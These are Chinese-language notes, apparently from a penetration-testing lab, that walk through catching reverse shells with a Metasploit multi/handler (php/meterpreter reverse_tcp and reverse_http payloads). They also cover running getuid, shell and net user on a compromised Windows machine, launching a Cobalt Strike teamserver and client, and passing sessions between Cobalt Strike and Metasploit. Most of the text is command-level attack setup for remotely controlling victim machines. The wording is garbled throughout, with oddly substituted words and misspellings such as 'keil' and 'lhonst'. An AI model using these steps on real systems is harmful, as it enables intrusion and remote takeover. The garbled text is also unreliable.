然后回到keil的上面去回联,由于从虚拟机上面反弹给你你就必要监听
Msfconsole
Use exploit/multi/handler
Set payload php/meterpreter/reverse_tcp//这个是反弹型木马,是受害者去自动接洽攻击者
Set lhost (keil也就是本地的ip地址)
Set lport 12345(毗连端口)
只要有一个回弹的权限就可以监听到(无法就是控制对方的电脑和网站,这个在antsword也可以做的)
它把你的木马弹返来后,接收到然后继续控制。
这个如果控制的Windows那么利用
Getuid是查看用户
命令:Shell进入Windows的窗口下看一下
利用命令:net user 可以查看权限
查看IEUser的权限
在keli先进去cs目次
Cd /cs/Server
无非就是client去拿到server(在公网)上的数据去共享
必要个毗连密码//实验权限
./teamserver IP(本身的ip地址) password(启动密码)
进去客户端
Cd ./cs/Client
./cobaltstrike-client.sh//这一步记得在kail虚拟机里面做有图形化界面(本身的接口ip和启动密码)
设置监听器
Payload
不带less的就是全功能
带less是一个下载器,会从服务端下载下来
要让他中马,就要将这个木马拿下来,以是启动虚拟机上面去,然后启动
这里面另有很多功能:代理、相互通报的功能
Cs与Msf联动
Span是相互通报的功能,你把你的shell通报给msf,msf把shell通报给你
命令:Msfconsole
Use exploit/multi/handler
Set payload php/meterpreter/reverse_http//这个是反弹型木马,是受害者去自动接洽攻击者,这里是http是由于cs我们的就是http
Set lhonst 本身的ip地址
Set lport 1234(端口)
Exploit
它就监听在这里了
然后就要用cs进行通报了,进行会话通报包管ip和端口号与ME中设置的同等